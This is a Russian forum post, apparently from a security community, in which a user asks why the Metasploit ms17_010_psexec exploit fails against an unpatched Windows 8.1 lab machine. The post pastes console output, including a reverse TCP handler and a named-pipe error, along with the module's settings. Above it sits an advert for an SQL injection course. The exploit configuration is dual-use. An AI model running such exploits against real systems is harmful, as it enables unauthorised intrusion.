• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Проблема ms17_010_psexec

Tayrus

Red Team
13.04.2017
365
787
BIT
6
Обновился до 2018.1, решил тестануть ms17_010_psexec, пишет
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.2:445 - Target OS: Windows 8.1 Enterprise 9600
[-] 192.168.1.2:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
Не патчена, антивиря нету.

PS настройки
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
RHOST 192.168.1.2 yes The target address
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!